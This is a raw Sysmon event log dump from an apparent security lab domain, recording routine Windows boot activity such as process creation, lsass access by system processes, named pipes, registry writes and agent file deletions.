09:19:58.124{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cca|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:58.124{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:58.092{5EBD8912-8CBD-6151-0A00-00000000FD01}624\scerpcC:\Windows\system32\services.exe 10341000x80000000000000001052538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:58.092{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cca|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:58.092{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:58.076{5EBD8912-8CBD-6151-0A00-00000000FD01}624\ntsvcsC:\Windows\system32\services.exe 10341000x80000000000000001052535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.654{5EBD8912-8CBD-6151-0B00-00000000FD01}640644C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+4f6ac|C:\Windows\system32\lsasrv.dll+5815f|C:\Windows\system32\lsasrv.dll+6369e|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.529{5EBD8912-8CBD-6151-0700-00000000FD01}488492C:\Windows\system32\wininit.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.529{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.529{5EBD8912-8CBD-6151-0700-00000000FD01}488492C:\Windows\system32\wininit.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.527{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\System32\wininit.exewininit.exe 10341000x80000000000000001052530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.467{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.467{5EBD8912-8CBD-6151-0700-00000000FD01}488492C:\Windows\system32\wininit.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.458{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exe10.0.14393.4169 (rs1_release.210107-1130)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=FEFC26105685C70D7260170489B5B520,SHA256=930F44F9A599937BDB23CF0C7EA4D158991B837D2A0975C15686CDD4198808E8,IMPHASH=A1C9FD59764D67AA201947276212F7CF{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\System32\wininit.exewininit.exe 17141700x80000000000000001052527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:57.451{5EBD8912-8CBD-6151-0700-00000000FD01}488\InitShutdownC:\Windows\system32\wininit.exe 13241300x80000000000000001052526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:19:57.357{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exeHKU\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguagesBinary Data 13241300x80000000000000001052525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:19:57.357{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exeHKU\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguagesBinary Data 10341000x80000000000000001052524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.295{5EBD8912-8CBD-6151-0600-00000000FD01}480484C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.293{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{5EBD8912-8CBD-6151-0600-00000000FD01}480C:\Windows\System32\smss.exe- 10341000x80000000000000001052522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.279{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0800-00000000FD01}496C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x80000000000000001052521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.264{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x80000000000000001052520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:57.264{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-429 10341000x80000000000000001052519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.248{5EBD8912-8CBC-6151-0400-00000000FD01}408412C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.250{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{5EBD8912-8CBC-6151-0400-00000000FD01}408C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000001d0 0000007c 10341000x80000000000000001052517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.248{5EBD8912-8CBD-6151-0600-00000000FD01}480484C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0800-00000000FD01}496C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.251{5EBD8912-8CBD-6151-0800-00000000FD01}496C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{5EBD8912-8CBD-6151-0600-00000000FD01}480C:\Windows\System32\smss.exe- 10341000x80000000000000001052515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.232{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0600-00000000FD01}480C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.232{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0600-00000000FD01}480C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x80000000000000001052513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.246{5EBD8912-8CBD-6151-0600-00000000FD01}480C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000001cc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{5EBD8912-8CA0-6151-0200-00000000FD01}324C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000001052512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:57.232{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000980524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:17.903{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAABCDA058D9870E6E8CC84C8401A118,SHA256=BD53CA5E44F78D617E1F89D78B9CE4883085EE5FE4B9A2AE1F97C7B2A54B3E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:17.903{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=461DADAFE0A09BFBE5221702DA74DCB2,SHA256=D06E30C3D4A78F940E94710D59C0E89534C18F3F111C9B81C1CEB3D7AC1A7334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:17.166{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F48B8E5D73FF390EE28332C07C3D7E,SHA256=21B0C036B25AE5D590E36792E43CE5F932C3C5D3D63FD5C772A61BD8BF09916E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:17.009{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4317MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.975{5EBD8912-8CC0-6151-1600-00000000FD01}12963092C:\Windows\system32\svchost.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.964{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD2-6151-4900-00000000FD01}3976C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.961{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD2-6151-4A00-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.960{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:18.960{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 